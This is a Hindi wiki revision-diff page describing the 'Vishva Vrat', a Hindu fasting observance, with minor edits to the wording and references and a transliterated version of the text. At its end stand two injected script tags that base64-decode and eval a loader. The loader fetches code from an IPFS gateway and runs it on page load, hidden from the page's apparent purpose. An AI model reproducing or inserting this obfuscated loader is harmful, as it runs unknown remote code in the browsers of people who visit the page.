Difference between revisions of "विश्व व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*प्रत्येक [[मास]] की [[दशमी]] पर एकभक्त, तिथिव्रत एक वर्ष तक रहना चाहिए।
 
*प्रत्येक [[मास]] की [[दशमी]] पर एकभक्त, तिथिव्रत एक वर्ष तक रहना चाहिए।
 
*अन्त में दस गायों तथा दस दिशाओं की स्वर्णिम या रजत प्रतिमाओं, एक दोना तिल के साथ, दान करना चाहिए।  
 
*अन्त में दस गायों तथा दस दिशाओं की स्वर्णिम या रजत प्रतिमाओं, एक दोना तिल के साथ, दान करना चाहिए।  
*इससे कर्ता सम्राट हो जाता है और सभी पाप कट जाते हैं।<ref> कृत्यकल्पतरु (451); हेमाद्रि (व्रतखण्ड 1, 983, [[पद्मपुराण]] से उद्धरण); [[मत्स्यपुराण]] (101|83)</ref> *एकादशी को विश्वेदेवों की पूजा करनी चाहिए। कमल दलों पर उनकी प्रतिमाएँ रखी जाती हैं। तिथिव्रत देवता, विश्वेदेव, घृत की धार, समिधाओं, दही, दूध एवं मधु का अर्पण करना चाहिए। <ref>हेमाद्रि (व्रतखण्ड 1, 1148, [[भविष्यपुराण]] से उद्धरण)।</ref>  
+
*इससे कर्ता सम्राट हो जाता है और सभी पाप कट जाते हैं।<ref> कृत्यकल्पतरु (451); हेमाद्रि (व्रतखण्ड 1, 983, [[पद्मपुराण]] से उद्धरण); [[मत्स्य पुराण]] (101|83</ref>  
 +
*एकादशी को विश्वेदेवों की पूजा करनी चाहिए।  
 +
*कमल दलों पर उनकी प्रतिमाएँ रखी जाती हैं।  
 +
*तिथिव्रत देवता, विश्वेदेव, घृत की धार, समिधाओं, दही, दूध एवं मधु का अर्पण करना चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 1148, [[भविष्यपुराण]] से उद्धरण)।</ref>  
 
*यह व्रत वैश्वानर [[प्रतिपदा]] की भाँति है।  
 
*यह व्रत वैश्वानर [[प्रतिपदा]] की भाँति है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratyek mas ki dashami par ekabhakt, tithivrat ek varsh tak rahana chahie.
  • ant mean das gayoan tatha das dishaoan ki svarnim ya rajat pratimaoan, ek dona til ke sath, dan karana chahie.
  • isase karta samrat ho jata hai aur sabhi pap kat jate haian.[1]
  • ekadashi ko vishvedevoan ki pooja karani chahie.
  • kamal daloan par unaki pratimaean rakhi jati haian.
  • tithivrat devata, vishvedev, ghrit ki dhar, samidhaoan, dahi, doodh evan madhu ka arpan karana chahie.[2]
  • yah vrat vaishvanar pratipada ki bhaanti hai.


tika tippani aur sandarbh

  1. krityakalpataru (451); hemadri (vratakhand 1, 983, padmapuran se uddharan); matsy puran (101|83
  2. hemadri (vratakhand 1, 1148, bhavishyapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>